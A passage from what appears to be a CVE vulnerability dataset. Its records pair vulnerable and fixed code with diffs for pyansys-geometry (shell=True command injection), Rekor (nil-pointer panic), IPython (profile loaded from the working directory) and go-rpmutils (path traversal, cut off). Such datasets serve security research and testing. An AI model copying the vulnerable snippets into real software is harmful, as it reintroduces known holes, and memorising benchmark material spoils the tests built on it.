This vulnerability is fixed in 0.3.3 and 0.4.12.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/ansys/pyansys-geometry", "patch_url": ["https://github.com/ansys/pyansys-geometry/commit/f82346b9432b06532e84f3278125f5879b4e9f3f", "https://github.com/ansys/pyansys-geometry/commit/902071701c4f3a8258cbaa46c28dc0a65442d1bc"], "programing_language": "Python", "vul_func": [{"id": "vul_py_385_1", "commit": "138ae18f810b3e556f90ca12164fc68bc76f063c", "file_path": "src/ansys/geometry/core/connection/product_instance.py", "start_line": 170, "end_line": 311, "snippet": "def prepare_and_start_backend(\n backend_type: BackendType,\n product_version: int = None,\n host: str = \"localhost\",\n port: int = None,\n enable_trace: bool = False,\n log_level: int = 2,\n api_version: ApiVersions = ApiVersions.LATEST,\n timeout: int = 150,\n manifest_path: str = None,\n logs_folder: str = None,\n hidden: bool = False,\n) -> \"Modeler\":\n \"\"\"\n Start the requested service locally using the ``ProductInstance`` class.\n\n When calling this method, a standalone service or product session is started.\n By default, if an endpoint is specified (by defining `host` and `port` parameters)\n but the endpoint is not available, the startup will fail. Otherwise, it will try to\n launch its own service.\n\n Parameters\n ----------\n product_version: ``int``, optional\n The product version to be started. Goes from v23.2.1 to\n the latest. Default is ``None``.\n If a specific product version is requested but not installed locally,\n a SystemError will be raised.\n host: str, optional\n IP address at which the Geometry service will be deployed. By default,\n its value will be ``localhost``.\n port : int, optional\n Port at which the Geometry service will be deployed. By default, its\n value will be ``None``.\n enable_trace : bool, optional\n Boolean enabling the logs trace on the Geometry service console window.\n By default its value is ``False``.\n log_level : int, optional\n Backend's log level from 0 to 3:\n 0: Chatterbox\n 1: Debug\n 2: Warning\n 3: Error\n\n The default is ``2`` (Warning).\n api_version: ``ApiVersions``, optional\n The backend's API version to be used at runtime. Goes from API v21 to\n the latest. Default is ``ApiVersions.LATEST``.\n timeout : int, optional\n Timeout for starting the backend startup process. 
The default is 150.\n manifest_path : str, optional\n Used to specify a manifest file path for the ApiServerAddin. This way,\n it is possible to run an ApiServerAddin from a version an older product\n version. Only applicable for Ansys Discovery and Ansys SpaceClaim.\n logs_folder : sets the backend's logs folder path. If nothing is defined,\n the backend will use its default path.\n hidden : starts the product hiding its UI. Default is ``False``.\n\n Raises\n ------\n ConnectionError\n If the specified endpoint is already in use, a connection error will be raised.\n SystemError\n If there is not an Ansys product 23.2 version or later installed\n or if a specific product's version is requested but not installed locally then\n a SystemError will be raised.\n\n Returns\n -------\n Modeler\n Instance of the Geometry service.\n \"\"\"\n from ansys.geometry.core.modeler import Modeler\n\n port = _check_port_or_get_one(port)\n installations = get_available_ansys_installations()\n if product_version != None:\n _check_version_is_available(product_version, installations)\n else:\n product_version = get_latest_ansys_installation()[0]\n _check_minimal_versions(product_version)\n\n args = []\n env_copy = _get_common_env(\n host=host,\n port=port,\n enable_trace=enable_trace,\n log_level=log_level,\n logs_folder=logs_folder,\n )\n\n if backend_type == BackendType.DISCOVERY:\n args.append(os.path.join(installations[product_version], DISCOVERY_FOLDER, DISCOVERY_EXE))\n if hidden is True:\n args.append(BACKEND_DISCOVERY_HIDDEN)\n\n # Here begins the spaceclaim arguments.\n args.append(BACKEND_SPACECLAIM_OPTIONS)\n args.append(\n BACKEND_ADDIN_MANIFEST_ARGUMENT\n + _manifest_path_provider(product_version, installations, manifest_path)\n )\n env_copy[BACKEND_API_VERSION_VARIABLE] = str(api_version)\n\n elif backend_type == BackendType.SPACECLAIM:\n args.append(os.path.join(installations[product_version], SPACECLAIM_FOLDER, SPACECLAIM_EXE))\n if hidden is True:\n args.append(BACKEND_SPACECLAIM_HIDDEN)\n args.append(BACKEND_SPLASH_OFF)\n args.append(\n BACKEND_ADDIN_MANIFEST_ARGUMENT\n + _manifest_path_provider(product_version, installations, manifest_path)\n )\n env_copy[BACKEND_API_VERSION_VARIABLE] = str(api_version)\n env_copy[BACKEND_SPACECLAIM_HIDDEN_ENVVAR_KEY] = BACKEND_SPACECLAIM_HIDDEN_ENVVAR_VALUE\n\n elif backend_type == BackendType.WINDOWS_SERVICE:\n latest_version = get_latest_ansys_installation()[0]\n args.append(\n os.path.join(\n installations[latest_version], WINDOWS_GEOMETRY_SERVICE_FOLDER, GEOMETRY_SERVICE_EXE\n )\n )\n else:\n raise RuntimeError(\n f\"Cannot connect to backend {backend_type.name} using ``prepare_and_start_backend()``\"\n )\n\n LOG.info(f\"Launching ProductInstance for {backend_type.name}\")\n LOG.debug(f\"Args: {args}\")\n LOG.debug(f\"Environment variables: {env_copy}\")\n\n instance = ProductInstance(_start_program(args, env_copy).pid)\n\n # Verify that the backend is ready to accept connections\n # before returning the Modeler instance.\n LOG.info(\"Waiting for backend to be ready...\")\n _wait_for_backend(host, port, timeout)\n\n return Modeler(\n host=host, port=port, timeout=timeout, product_instance=instance, backend_type=backend_type\n )"}, {"id": "vul_py_385_2", "commit": "138ae18f810b3e556f90ca12164fc68bc76f063c", "file_path": "src/ansys/geometry/core/connection/product_instance.py", "start_line": 403, "end_line": 429, "snippet": "def _start_program(args: List[str], local_env: Dict[str, str]) -> subprocess.Popen:\n \"\"\"\n Start the program where the path is 
the first item of the ``args`` array argument.\n\n Parameters\n ----------\n args : List[str]\n List of arguments to be passed to the program. The first list's item shall\n be the program path.\n local_env : Dict[str,str]\n Environment variables to be passed to the program.\n\n Returns\n -------\n subprocess.Popen\n The subprocess object.\n \"\"\"\n return subprocess.Popen(\n args,\n shell=os.name != \"nt\",\n stdin=subprocess.DEVNULL,\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL,\n env=local_env,\n )\n\n"}], "fix_func": [{"id": "fix_py_385_1", "commit": "f82346b9432b06532e84f3278125f5879b4e9f3f", "file_path": "src/ansys/geometry/core/connection/product_instance.py", "start_line": 170, "end_line": 314, "snippet": "def prepare_and_start_backend(\n backend_type: BackendType,\n product_version: int = None,\n host: str = \"localhost\",\n port: int = None,\n enable_trace: bool = False,\n log_level: int = 2,\n api_version: ApiVersions = ApiVersions.LATEST,\n timeout: int = 150,\n manifest_path: str = None,\n logs_folder: str = None,\n hidden: bool = False,\n) -> \"Modeler\":\n \"\"\"\n Start the requested service locally using the ``ProductInstance`` class.\n\n When calling this method, a standalone service or product session is started.\n By default, if an endpoint is specified (by defining `host` and `port` parameters)\n but the endpoint is not available, the startup will fail. Otherwise, it will try to\n launch its own service.\n\n Parameters\n ----------\n product_version: ``int``, optional\n The product version to be started. Goes from v23.2.1 to\n the latest. Default is ``None``.\n If a specific product version is requested but not installed locally,\n a SystemError will be raised.\n host: str, optional\n IP address at which the Geometry service will be deployed. By default,\n its value will be ``localhost``.\n port : int, optional\n Port at which the Geometry service will be deployed. By default, its\n value will be ``None``.\n enable_trace : bool, optional\n Boolean enabling the logs trace on the Geometry service console window.\n By default its value is ``False``.\n log_level : int, optional\n Backend's log level from 0 to 3:\n 0: Chatterbox\n 1: Debug\n 2: Warning\n 3: Error\n\n The default is ``2`` (Warning).\n api_version: ``ApiVersions``, optional\n The backend's API version to be used at runtime. Goes from API v21 to\n the latest. Default is ``ApiVersions.LATEST``.\n timeout : int, optional\n Timeout for starting the backend startup process. The default is 150.\n manifest_path : str, optional\n Used to specify a manifest file path for the ApiServerAddin. This way,\n it is possible to run an ApiServerAddin from a version an older product\n version. Only applicable for Ansys Discovery and Ansys SpaceClaim.\n logs_folder : sets the backend's logs folder path. If nothing is defined,\n the backend will use its default path.\n hidden : starts the product hiding its UI. 
Default is ``False``.\n\n Raises\n ------\n ConnectionError\n If the specified endpoint is already in use, a connection error will be raised.\n SystemError\n If there is not an Ansys product 23.2 version or later installed\n or if a specific product's version is requested but not installed locally then\n a SystemError will be raised.\n\n Returns\n -------\n Modeler\n Instance of the Geometry service.\n \"\"\"\n from ansys.geometry.core.modeler import Modeler\n\n if os.name != \"nt\": # pragma: no cover\n raise RuntimeError(\"Method 'prepare_and_start_backend' is only available on Windows.\")\n\n port = _check_port_or_get_one(port)\n installations = get_available_ansys_installations()\n if product_version != None:\n _check_version_is_available(product_version, installations)\n else:\n product_version = get_latest_ansys_installation()[0]\n _check_minimal_versions(product_version)\n\n args = []\n env_copy = _get_common_env(\n host=host,\n port=port,\n enable_trace=enable_trace,\n log_level=log_level,\n logs_folder=logs_folder,\n )\n\n if backend_type == BackendType.DISCOVERY:\n args.append(os.path.join(installations[product_version], DISCOVERY_FOLDER, DISCOVERY_EXE))\n if hidden is True:\n args.append(BACKEND_DISCOVERY_HIDDEN)\n\n # Here begins the spaceclaim arguments.\n args.append(BACKEND_SPACECLAIM_OPTIONS)\n args.append(\n BACKEND_ADDIN_MANIFEST_ARGUMENT\n + _manifest_path_provider(product_version, installations, manifest_path)\n )\n env_copy[BACKEND_API_VERSION_VARIABLE] = str(api_version)\n\n elif backend_type == BackendType.SPACECLAIM:\n args.append(os.path.join(installations[product_version], SPACECLAIM_FOLDER, SPACECLAIM_EXE))\n if hidden is True:\n args.append(BACKEND_SPACECLAIM_HIDDEN)\n args.append(BACKEND_SPLASH_OFF)\n args.append(\n BACKEND_ADDIN_MANIFEST_ARGUMENT\n + _manifest_path_provider(product_version, installations, manifest_path)\n )\n env_copy[BACKEND_API_VERSION_VARIABLE] = str(api_version)\n env_copy[BACKEND_SPACECLAIM_HIDDEN_ENVVAR_KEY] = BACKEND_SPACECLAIM_HIDDEN_ENVVAR_VALUE\n\n elif backend_type == BackendType.WINDOWS_SERVICE:\n latest_version = get_latest_ansys_installation()[0]\n args.append(\n os.path.join(\n installations[latest_version], WINDOWS_GEOMETRY_SERVICE_FOLDER, GEOMETRY_SERVICE_EXE\n )\n )\n else:\n raise RuntimeError(\n f\"Cannot connect to backend {backend_type.name} using ``prepare_and_start_backend()``\"\n )\n\n LOG.info(f\"Launching ProductInstance for {backend_type.name}\")\n LOG.debug(f\"Args: {args}\")\n LOG.debug(f\"Environment variables: {env_copy}\")\n\n instance = ProductInstance(_start_program(args, env_copy).pid)\n\n # Verify that the backend is ready to accept connections\n # before returning the Modeler instance.\n LOG.info(\"Waiting for backend to be ready...\")\n _wait_for_backend(host, port, timeout)\n\n return Modeler(\n host=host, port=port, timeout=timeout, product_instance=instance, backend_type=backend_type\n )"}, {"id": "fix_py_385_2", "commit": "f82346b9432b06532e84f3278125f5879b4e9f3f", "file_path": "src/ansys/geometry/core/connection/product_instance.py", "start_line": 406, "end_line": 429, "snippet": "def _start_program(args: List[str], local_env: Dict[str, str]) -> subprocess.Popen:\n \"\"\"\n Start the program where the path is the first item of the ``args`` array argument.\n\n Parameters\n ----------\n args : List[str]\n List of arguments to be passed to the program. 
The first list's item shall\n be the program path.\n local_env : Dict[str,str]\n Environment variables to be passed to the program.\n\n Returns\n -------\n subprocess.Popen\n The subprocess object.\n \"\"\"\n return subprocess.Popen(\n args,\n stdin=subprocess.DEVNULL,\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL,\n env=local_env,\n )"}], "vul_patch": "--- a/src/ansys/geometry/core/connection/product_instance.py\n+++ b/src/ansys/geometry/core/connection/product_instance.py\n@@ -72,6 +72,9 @@\n \"\"\"\n from ansys.geometry.core.modeler import Modeler\n \n+ if os.name != \"nt\": # pragma: no cover\n+ raise RuntimeError(\"Method 'prepare_and_start_backend' is only available on Windows.\")\n+\n port = _check_port_or_get_one(port)\n installations = get_available_ansys_installations()\n if product_version != None:\n\n--- a/src/ansys/geometry/core/connection/product_instance.py\n+++ b/src/ansys/geometry/core/connection/product_instance.py\n@@ -17,10 +17,8 @@\n \"\"\"\n return subprocess.Popen(\n args,\n- shell=os.name != \"nt\",\n stdin=subprocess.DEVNULL,\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL,\n env=local_env,\n )\n-\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-33199", "cve_description": "Rekor's goals are to provide an immutable tamper resistant ledger of metadata generated within a software projects supply chain. A malformed proposed entry of the `intoto/v0.0.2` type can cause a panic on a thread within the Rekor process. The thread is recovered so the client receives a 500 error message and service still continues, so the availability impact of this is minimal. This has been fixed in v1.2.0 of Rekor. Users are advised to upgrade. There are no known workarounds for this vulnerability.", "cwe_info": {"CWE-617": {"name": "Reachable Assertion", "description": "The product contains an assert() or similar statement that can be triggered by an attacker, which leads to an application exit or other behavior that is more severe than necessary."}}, "repo": "https://github.com/sigstore/rekor", "patch_url": ["https://github.com/sigstore/rekor/commit/140c5add105179e5ffd9e3e114fd1b6b93aebbd4"], "programing_language": "Go", "vul_func": [{"id": "vul_go_286_1", "commit": "85bb2bc7a35dcc94cd94e18984711806f437dcb6", "file_path": "pkg/types/dsse/v0.0.1/entry.go", "start_line": 74, "end_line": 145, "snippet": "func (v V001Entry) IndexKeys() ([]string, error) {\n\tvar result []string\n\n\tfor _, sig := range v.DSSEObj.Signatures {\n\t\tkeyObj, err := x509.NewPublicKey(bytes.NewReader(*sig.Verifier))\n\t\tif err != nil {\n\t\t\treturn result, err\n\t\t}\n\n\t\tcanonKey, err := keyObj.CanonicalValue()\n\t\tif err != nil {\n\t\t\treturn result, fmt.Errorf(\"could not canonicalize key: %w\", err)\n\t\t}\n\n\t\tkeyHash := sha256.Sum256(canonKey)\n\t\tresult = append(result, \"sha256:\"+hex.EncodeToString(keyHash[:]))\n\n\t\tresult = append(result, keyObj.Subjects()...)\n\t}\n\n\tif v.DSSEObj.PayloadHash != nil {\n\t\tpayloadHashKey := strings.ToLower(fmt.Sprintf(\"%s:%s\", *v.DSSEObj.PayloadHash.Algorithm, *v.DSSEObj.PayloadHash.Value))\n\t\tresult = append(result, payloadHashKey)\n\t}\n\n\tif v.DSSEObj.EnvelopeHash != nil {\n\t\tenvelopeHashKey := strings.ToLower(fmt.Sprintf(\"%s:%s\", *v.DSSEObj.EnvelopeHash.Algorithm, *v.DSSEObj.EnvelopeHash.Value))\n\t\tresult = append(result, envelopeHashKey)\n\t}\n\n\tif v.env == nil {\n\t\tlog.Logger.Info(\"DSSEObj content or DSSE envelope is nil, returning partial set of keys\")\n\t\treturn result, nil\n\t}\n\n\tswitch 
v.env.PayloadType {\n\tcase in_toto.PayloadType:\n\n\t\tif v.env.Payload == \"\" {\n\t\t\tlog.Logger.Info(\"DSSEObj DSSE payload is empty\")\n\t\t\treturn result, nil\n\t\t}\n\t\tdecodedPayload, err := v.env.DecodeB64Payload()\n\t\tif err != nil {\n\t\t\treturn result, fmt.Errorf(\"could not decode envelope payload: %w\", err)\n\t\t}\n\t\tstatement, err := parseStatement(decodedPayload)\n\t\tif err != nil {\n\t\t\treturn result, err\n\t\t}\n\t\tfor _, s := range statement.Subject {\n\t\t\tfor alg, ds := range s.Digest {\n\t\t\t\tresult = append(result, alg+\":\"+ds)\n\t\t\t}\n\t\t}\n\t\t// Not all in-toto statements will contain a SLSA provenance predicate.\n\t\t// See https://github.com/in-toto/attestation/blob/main/spec/README.md#predicate\n\t\t// for other predicates.\n\t\tif predicate, err := parseSlsaPredicate(decodedPayload); err == nil {\n\t\t\tif predicate.Predicate.Materials != nil {\n\t\t\t\tfor _, s := range predicate.Predicate.Materials {\n\t\t\t\t\tfor alg, ds := range s.Digest {\n\t\t\t\t\t\tresult = append(result, alg+\":\"+ds)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\tdefault:\n\t\tlog.Logger.Infof(\"Unknown DSSE envelope payloadType: %s\", v.env.PayloadType)\n\t}\n\treturn result, nil\n}"}, {"id": "vul_go_286_2", "commit": "85bb2bc7a35dcc94cd94e18984711806f437dcb6", "file_path": "pkg/types/dsse/v0.0.1/entry.go", "start_line": 163, "end_line": 206, "snippet": "func (v *V001Entry) Unmarshal(pe models.ProposedEntry) error {\n\tit, ok := pe.(*models.DSSE)\n\tif !ok {\n\t\treturn errors.New(\"cannot unmarshal non DSSE v0.0.1 type\")\n\t}\n\n\tdsseObj := &models.DSSEV001Schema{}\n\n\tif err := types.DecodeEntry(it.Spec, dsseObj); err != nil {\n\t\treturn err\n\t}\n\n\t// field validation\n\tif err := dsseObj.Validate(strfmt.Default); err != nil {\n\t\treturn err\n\t}\n\n\t// either we have just proposed content or the canonicalized fields\n\tif dsseObj.ProposedContent == nil {\n\t\t// then we need canonicalized fields, and all must be present (if present, they would have been validated in the above call to Validate())\n\t\tif dsseObj.EnvelopeHash == nil || dsseObj.PayloadHash == nil || len(dsseObj.Signatures) == 0 {\n\t\t\treturn errors.New(\"either proposedContent or envelopeHash, payloadHash, and signatures must be present\")\n\t\t}\n\t\tv.DSSEObj = *dsseObj\n\t\treturn nil\n\t}\n\t// if we're here, then we're trying to propose a new entry so we check to ensure client's aren't setting server-side computed fields\n\tif dsseObj.EnvelopeHash != nil || dsseObj.PayloadHash != nil || len(dsseObj.Signatures) != 0 {\n\t\treturn errors.New(\"either proposedContent or envelopeHash, payloadHash, and signatures must be present but not both\")\n\t}\n\n\tenv := &dsse.Envelope{}\n\tif err := json.Unmarshal([]byte(*dsseObj.ProposedContent.Envelope), env); err != nil {\n\t\treturn err\n\t}\n\n\tif len(env.Signatures) == 0 {\n\t\treturn errors.New(\"DSSE envelope must contain 1 or more signatures\")\n\t}\n\n\tallPubKeyBytes := make([][]byte, 0)\n\tfor _, publicKey := range dsseObj.ProposedContent.Verifiers {\n\t\tallPubKeyBytes = append(allPubKeyBytes, publicKey)\n\t}"}], "fix_func": [{"id": "fix_go_286_1", "commit": "140c5add105179e5ffd9e3e114fd1b6b93aebbd4", "file_path": "pkg/types/dsse/v0.0.1/entry.go", "start_line": 74, "end_line": 148, "snippet": "func (v V001Entry) IndexKeys() ([]string, error) {\n\tvar result []string\n\n\tfor _, sig := range v.DSSEObj.Signatures {\n\t\tif sig == nil || sig.Verifier == nil {\n\t\t\treturn result, errors.New(\"missing or malformed public 
key\")\n\t\t}\n\t\tkeyObj, err := x509.NewPublicKey(bytes.NewReader(*sig.Verifier))\n\t\tif err != nil {\n\t\t\treturn result, err\n\t\t}\n\n\t\tcanonKey, err := keyObj.CanonicalValue()\n\t\tif err != nil {\n\t\t\treturn result, fmt.Errorf(\"could not canonicalize key: %w\", err)\n\t\t}\n\n\t\tkeyHash := sha256.Sum256(canonKey)\n\t\tresult = append(result, \"sha256:\"+hex.EncodeToString(keyHash[:]))\n\n\t\tresult = append(result, keyObj.Subjects()...)\n\t}\n\n\tif v.DSSEObj.PayloadHash != nil {\n\t\tpayloadHashKey := strings.ToLower(fmt.Sprintf(\"%s:%s\", *v.DSSEObj.PayloadHash.Algorithm, *v.DSSEObj.PayloadHash.Value))\n\t\tresult = append(result, payloadHashKey)\n\t}\n\n\tif v.DSSEObj.EnvelopeHash != nil {\n\t\tenvelopeHashKey := strings.ToLower(fmt.Sprintf(\"%s:%s\", *v.DSSEObj.EnvelopeHash.Algorithm, *v.DSSEObj.EnvelopeHash.Value))\n\t\tresult = append(result, envelopeHashKey)\n\t}\n\n\tif v.env == nil {\n\t\tlog.Logger.Info(\"DSSEObj content or DSSE envelope is nil, returning partial set of keys\")\n\t\treturn result, nil\n\t}\n\n\tswitch v.env.PayloadType {\n\tcase in_toto.PayloadType:\n\n\t\tif v.env.Payload == \"\" {\n\t\t\tlog.Logger.Info(\"DSSEObj DSSE payload is empty\")\n\t\t\treturn result, nil\n\t\t}\n\t\tdecodedPayload, err := v.env.DecodeB64Payload()\n\t\tif err != nil {\n\t\t\treturn result, fmt.Errorf(\"could not decode envelope payload: %w\", err)\n\t\t}\n\t\tstatement, err := parseStatement(decodedPayload)\n\t\tif err != nil {\n\t\t\treturn result, err\n\t\t}\n\t\tfor _, s := range statement.Subject {\n\t\t\tfor alg, ds := range s.Digest {\n\t\t\t\tresult = append(result, alg+\":\"+ds)\n\t\t\t}\n\t\t}\n\t\t// Not all in-toto statements will contain a SLSA provenance predicate.\n\t\t// See https://github.com/in-toto/attestation/blob/main/spec/README.md#predicate\n\t\t// for other predicates.\n\t\tif predicate, err := parseSlsaPredicate(decodedPayload); err == nil {\n\t\t\tif predicate.Predicate.Materials != nil {\n\t\t\t\tfor _, s := range predicate.Predicate.Materials {\n\t\t\t\t\tfor alg, ds := range s.Digest {\n\t\t\t\t\t\tresult = append(result, alg+\":\"+ds)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\tdefault:\n\t\tlog.Logger.Infof(\"Unknown DSSE envelope payloadType: %s\", v.env.PayloadType)\n\t}\n\treturn result, nil\n}"}, {"id": "fix_go_286_2", "commit": "140c5add105179e5ffd9e3e114fd1b6b93aebbd4", "file_path": "pkg/types/dsse/v0.0.1/entry.go", "start_line": 166, "end_line": 213, "snippet": "func (v *V001Entry) Unmarshal(pe models.ProposedEntry) error {\n\tit, ok := pe.(*models.DSSE)\n\tif !ok {\n\t\treturn errors.New(\"cannot unmarshal non DSSE v0.0.1 type\")\n\t}\n\n\tdsseObj := &models.DSSEV001Schema{}\n\n\tif err := types.DecodeEntry(it.Spec, dsseObj); err != nil {\n\t\treturn err\n\t}\n\n\t// field validation\n\tif err := dsseObj.Validate(strfmt.Default); err != nil {\n\t\treturn err\n\t}\n\n\t// either we have just proposed content or the canonicalized fields\n\tif dsseObj.ProposedContent == nil {\n\t\t// then we need canonicalized fields, and all must be present (if present, they would have been validated in the above call to Validate())\n\t\tif dsseObj.EnvelopeHash == nil || dsseObj.PayloadHash == nil || len(dsseObj.Signatures) == 0 {\n\t\t\treturn errors.New(\"either proposedContent or envelopeHash, payloadHash, and signatures must be present\")\n\t\t}\n\t\tv.DSSEObj = *dsseObj\n\t\treturn nil\n\t}\n\t// if we're here, then we're trying to propose a new entry so we check to ensure client's aren't setting server-side computed fields\n\tif 
dsseObj.EnvelopeHash != nil || dsseObj.PayloadHash != nil || len(dsseObj.Signatures) != 0 {\n\t\treturn errors.New(\"either proposedContent or envelopeHash, payloadHash, and signatures must be present but not both\")\n\t}\n\n\tenv := &dsse.Envelope{}\n\tif err := json.Unmarshal([]byte(*dsseObj.ProposedContent.Envelope), env); err != nil {\n\t\treturn err\n\t}\n\n\tif len(env.Signatures) == 0 {\n\t\treturn errors.New(\"DSSE envelope must contain 1 or more signatures\")\n\t}\n\n\tallPubKeyBytes := make([][]byte, 0)\n\tfor _, publicKey := range dsseObj.ProposedContent.Verifiers {\n\t\tif publicKey == nil {\n\t\t\treturn errors.New(\"an invalid null verifier was provided in ProposedContent\")\n\t\t}\n\n\t\tallPubKeyBytes = append(allPubKeyBytes, publicKey)\n\t}"}], "vul_patch": "--- a/pkg/types/dsse/v0.0.1/entry.go\n+++ b/pkg/types/dsse/v0.0.1/entry.go\n@@ -2,6 +2,9 @@\n \tvar result []string\n \n \tfor _, sig := range v.DSSEObj.Signatures {\n+\t\tif sig == nil || sig.Verifier == nil {\n+\t\t\treturn result, errors.New(\"missing or malformed public key\")\n+\t\t}\n \t\tkeyObj, err := x509.NewPublicKey(bytes.NewReader(*sig.Verifier))\n \t\tif err != nil {\n \t\t\treturn result, err\n\n--- a/pkg/types/dsse/v0.0.1/entry.go\n+++ b/pkg/types/dsse/v0.0.1/entry.go\n@@ -40,5 +40,9 @@\n \n \tallPubKeyBytes := make([][]byte, 0)\n \tfor _, publicKey := range dsseObj.ProposedContent.Verifiers {\n+\t\tif publicKey == nil {\n+\t\t\treturn errors.New(\"an invalid null verifier was provided in ProposedContent\")\n+\t\t}\n+\n \t\tallPubKeyBytes = append(allPubKeyBytes, publicKey)\n \t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-21699", "cve_description": "IPython (Interactive Python) is a command shell for interactive computing in multiple programming languages, originally developed for the Python programming language. Affected versions are subject to an arbitrary code execution vulnerability achieved by not properly managing cross user temporary files. This vulnerability allows one user to run code as another on the same machine. 
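The Rekor record above (CVE-2023-33199) is a reachable-nil problem rather than a logic flaw: `Signatures` entries and `Verifiers` arrive in the attacker-controlled proposed entry, and the fix simply refuses nil values before dereferencing them. A rough Python rendition of that guard; the `Signature` type here is illustrative, not Rekor's:

```python
from dataclasses import dataclass
from typing import List, Optional

@dataclass
class Signature:
    verifier: Optional[bytes]  # optional field taken from the proposed entry

def index_keys(signatures: List[Optional[Signature]]) -> List[str]:
    keys = []
    for sig in signatures:
        if sig is None or sig.verifier is None:
            # Fail with an error the API layer can turn into a 4xx response,
            # instead of dereferencing None and killing the worker.
            raise ValueError("missing or malformed public key")
        keys.append(sig.verifier.hex())
    return keys

print(index_keys([Signature(verifier=b"\x01\x02")]))  # ['0102']
```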
All users are advised to upgrade.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/ipython/ipython", "patch_url": ["https://github.com/ipython/ipython/commit/46a51ed69cdf41b4333943d9ceeb945c4ede5668", "https://github.com/ipython/ipython/commit/5fa1e409d2dc126c456510c16ece18e08b524e5b", "https://github.com/ipython/ipython/commit/a06ca837273271b4acb82c29be97c0b6d12a30ea", "https://github.com/ipython/ipython/commit/67ca2b3aa9039438e6f80e3fccca556f26100b4d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_13_1", "commit": "50b3d1f", "file_path": "IPython/core/profiledir.py", "start_line": 184, "end_line": 209, "snippet": " def find_profile_dir_by_name(cls, ipython_dir, name=u'default', config=None):\n \"\"\"Find an existing profile dir by profile name, return its ProfileDir.\n\n This searches through a sequence of paths for a profile dir. If it\n is not found, a :class:`ProfileDirError` exception will be raised.\n\n The search path algorithm is:\n 1. ``os.getcwd()``\n 2. ``ipython_dir``\n\n Parameters\n ----------\n ipython_dir : unicode or str\n The IPython directory to use.\n name : unicode or str\n The name of the profile. The name of the profile directory\n will be \"profile_<name>\".\n \"\"\"\n dirname = u'profile_' + name\n paths = [os.getcwd(), ipython_dir]\n for p in paths:\n profile_dir = os.path.join(p, dirname)\n if os.path.isdir(profile_dir):\n return cls(location=profile_dir, config=config)\n else:\n raise ProfileDirError('Profile directory not found in paths: %s' % dirname)"}], "fix_func": [{"id": "fix_py_13_1", "commit": "46a51ed", "file_path": "IPython/core/profiledir.py", "start_line": 184, "end_line": 209, "snippet": " def find_profile_dir_by_name(cls, ipython_dir, name=u'default', config=None):\n \"\"\"Find an existing profile dir by profile name, return its ProfileDir.\n\n This searches through a sequence of paths for a profile dir. If it\n is not found, a :class:`ProfileDirError` exception will be raised.\n\n The search path algorithm is:\n 1. ``os.getcwd()`` # removed for security reason.\n 2. ``ipython_dir``\n\n Parameters\n ----------\n ipython_dir : unicode or str\n The IPython directory to use.\n name : unicode or str\n The name of the profile. The name of the profile directory\n will be \"profile_<name>\".\n \"\"\"\n dirname = u'profile_' + name\n paths = [ipython_dir]\n for p in paths:\n profile_dir = os.path.join(p, dirname)\n if os.path.isdir(profile_dir):\n return cls(location=profile_dir, config=config)\n else:\n raise ProfileDirError('Profile directory not found in paths: %s' % dirname)"}], "vul_patch": "--- a/IPython/core/profiledir.py\n+++ b/IPython/core/profiledir.py\n@@ -5,7 +5,7 @@\n is not found, a :class:`ProfileDirError` exception will be raised.\n \n The search path algorithm is:\n- 1. ``os.getcwd()``\n+ 1. ``os.getcwd()`` # removed for security reason.\n 2. 
``ipython_dir``\n \n Parameters\n@@ -17,7 +17,7 @@\n will be \"profile_\".\n \"\"\"\n dirname = u'profile_' + name\n- paths = [os.getcwd(), ipython_dir]\n+ paths = [ipython_dir]\n for p in paths:\n profile_dir = os.path.join(p, dirname)\n if os.path.isdir(profile_dir):\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-21699:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/ipython\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2022-21699/bin/python -W ignore::UserWarning -m pytest IPython/tests/cve.py\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-21699:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/ipython\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2022-21699/bin/python -m pytest -v IPython/core/tests/test_profile.py IPython/core/tests/test_application.py"} {"cve_id": "CVE-2020-7667", "cve_description": "In package github.com/sassoftware/go-rpmutils/cpio before version 0.1.0, the CPIO extraction functionality doesn't sanitize the paths of the archived files for leading and non-leading \"..\" which leads in file extraction outside of the current directory. Note: the fixing commit was applied to all affected versions which were re-released.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted 